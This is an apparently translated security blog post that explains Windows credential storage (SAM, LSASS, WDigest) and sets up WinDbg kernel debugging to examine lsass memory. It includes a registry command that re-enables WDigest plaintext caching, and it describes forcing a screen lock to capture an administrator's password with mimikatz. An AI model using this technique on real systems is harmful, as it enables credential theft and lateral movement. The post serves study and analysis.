Analysis of Windows Credentials Mechanism

"Job hunting" ahahaha here is the advertisement, the blogger himself, 23 years old in web security, online job hunting, undergraduate degree has a period of internship in a big factory, is there any big boss who is short of people or has a referral boss to give a chance, Please, please contact me on WeChat to give your resume: ocean888-_-

We know that when Wdigest is enabled in win10/server2012 and above, the plaintext password cannot be obtained through mimikatz. You need to enable wdigest through the registry to capture the plaintext password. This article uses windbg debugging to see what changes have taken place in the memory

Let's take a look at the basics of the Windows credential mechanism before debugging

Windows Credentials Mechanism

critical infrastructure

SAM file

SAM (Security Account Manager), the database file used by SAM to store Windows operating system passwords. In order to avoid the disclosure of plaintext passwords, the SAM file stores the Hash values ​​of plaintext passwords processed by a series of algorithms. The saved Hash is divided into LM Hash (now obsolete), NTLMHash (length 32bit composed of alphanumeric) . When a user logs in to the system locally or remotely, the Hash value will be compared with the Hash value saved in the SAM file. In the later Windows system, the password Hash saved in the SAM file is encrypted by the key SYSKEY

• The location of the SAM file on disk is: C:\windows\system32\config\sam
• SAM files are locked by the system after the Windows system starts and cannot be moved and copied
• SAM is used to store user passwords, Internet Explorer passwords, service account passwords, SQL passwords, system account passwords, and configured scheduled task account passwords

Lsass process

The Local Security Authority Subsystem Service (LSASS) is a process in the Microsoft Windows operating system that is responsible for enforcing security policies on the system. It authenticates user logins to Windows computers or servers, handles password changes, creates access tokens, and more. The dump lsass we often say is to dump the clear text login password in the Lsass process

Windows authentication process

Windows local authentication

The Window local login process is shown in the figure above: after logout or startup: the login interface pops up to accept user input, and the winlogon.exe process is used to manage user login and logout. When a user enters a password to log in, the following operations occur:

1. The winlogon.exe process gives the account password to the lsass.exe process for processing, and caches the plaintext password in the process
2. The lsass.exe process encrypts the plaintext password into NTLM Hash, and compares and authenticates the SAM database

If the comparison results are the same, the login is successful, and if they are not the same, the login fails. There are two problems in the analysis of the whole process:

1. The lsass.exe process will store the plaintext password in the process, which is why the low-version system can directly capture the plaintext password
2. Use NTLM hash for comparison. Since the NTLM protocol does not verify the authentication initiator, if the attacker can get the hash through some means, the attacker can capture the hash value of the password (corresponding to the value of the password) to Lateral access to other network systems, that is, PTH pass-the-hash attack

Supplement: In addition to local authentication, there are network authentication based on NTLM protocol and domain authentication based on Kerberos protocol

What is Wdigest?

WDigest stands for Digest Authentication, which is a challenge/response protocol primarily used in Windows Server 2003 for LDAP and Web-based authentication. It utilizes Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges for authentication. The problem with WDigest is that it stores the password in memory, and stores it in memory whether you use it or not

In win 7 and 2008 r2 and before, Wdigest is enabled by default and cannot be disabled. You need to install the KB2871997 patch to disable wdigest (but Microsoft has disabled the Wdigest protocol by default in WIN7 and 08 later systems)

Therefore, when Wdigest is disabled in win10/server2012 and above, the password capture needs to manually modify the registry + force lock the screen + wait for the target system administrator to log in again = intercept the plaintext password

Command to modify the registry:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

You can also modify the registry through powershell, msf, etc.

About how mimikatz implements the code analysis of sekurlsa::wdigest, you can read this article: Debugging mimikatz source code: wdigest function source code debugging detailed process and analysis

windbgdebug

Windbg is a free source-level debugging tool developed by Microsoft. Windbg can be used for Kernel mode debugging and user mode debugging, and can also debug Dump files

Official documents and download address: https://docs.microsoft.com/zh-cn/windows-hardware/drivers/debugger/debugger-download-tools

When debugging windows, it is not possible to simply attach WinDBG lsassto , and if you do, Windows will stop, warning the user that the system is about to restart. Therefore, we need to attach the kernel, then switch from Ring-0 to lsass the process

Two-machine remote debugging environment construction

lab environment

• Windows 11 physical machine + windbg
• Windows 10 virtual machine (bridged mode)

Microsoft

The old version uses the com interface:

• Win10 uses winDbg and win7 in VMware for dual-machine debugging

The new version uses a network connection:

• Automatically set up KDNET network kernel debugging

  Note: The computer running the debugger is called the host computer , and the computer being debugged is called the target computer . To use automatic setup the host computer must be running Windows 7 or later and the target computer must be running Windows 8 or later

• Manually set up KDNET network kernel debugging

Next we configure, I use the most basic com serial port connection

1. Set up the serial port of the target virtual machine, use a named pipe with \\.\pipe\a prefix, and you can write a short and easy-to-remember name for the latter name

   

2. Configure debugging parameters in the target machine

   bcdedit generates a new startup item based on default for debugging. In fact, the name default is not seen through bcdedit /enum

   bcdedit /copy {default} /d "vmdebug"
   

   The item was successfully copied to {7985b4ec-581d-11ec-bee9-8214e8b021aa}

   Copy this id and paste it into the document of the real machine

   If you restart at this time, there will be one more startup item selection, but you can’t see it. You need to set a timeout to make the system stay in the startup item selection interface.

   bcdedit /timeout 10
   

   Setting the timeout will stay on the startup item selection interface for 10 seconds, and enter the default startup item if it exceeds 10 seconds

   

   Enter from the vmdebug option after restarting, set vmdebug to debug mode, so as not to affect the system environment of the default startup mode

   bcdedit /dbgsettings serial baudrate:115200 debugport:2
   

   Note that this debugport is the port number for creating the serial port of the virtual machine. From the screenshot at the time of creation, serial port 2, debugport should be 2, if you don’t know. You can only set one first, and then re-enter the command to modify the serial port when it is not connected.

   bcdedit /debug {ID} ON
   

   The ID is the id generated after creating vmdebug from bcdedit /copy, and can also be queried through bcdedit /enum

   Restart, stop at the startup item

3. link using windbg

   

   If it keeps prompting busy, use ctrl+break key to interrupt, 87-key keyboard needs (FN+Pause), enter the debugger

   

TIP：

1. Kernel debugging must use dual-machine debugging
2. windbg preview is easier to use than the old version
3. Wait for the system to enter the password input interface, then break, and then there will be an lsass process

debug analysis

command line parameters

WinDbg Command Manual

Detailed use of windbg

1. After attaching the kernel debugger, we need to grab the address lsassof the process EPROCESS, we can use the following command!process 0 0 lsass.exe

   

2. After determining EPROCESSthe address ( ffff9d01325a7080), we can request that the debug session be switched to lsassthe context of the process

   .process /i /p /r ffff9d01325a7080
   

   

3. Use lmcommands to determine access permissions for a space

   

Export passwords via mimikatz before enabling wdigest

Open UseLogonCredential by modifying the registry to view changes in memory

(The picture is quoted from Anke)

After locking the screen, wait for the user to log in again, and then import the password, which is the saved plaintext password

About how the mimikatz wdigest module is implemented, you can see the following two analysis articles:

Exploring Mimikatz - Part 1 - WDigest

An in-depth analysis of Mimikatz: WDigest

reference link

Windows Credentials Mechanism

Use WinDbg local kernel debugger to attack Windows kernel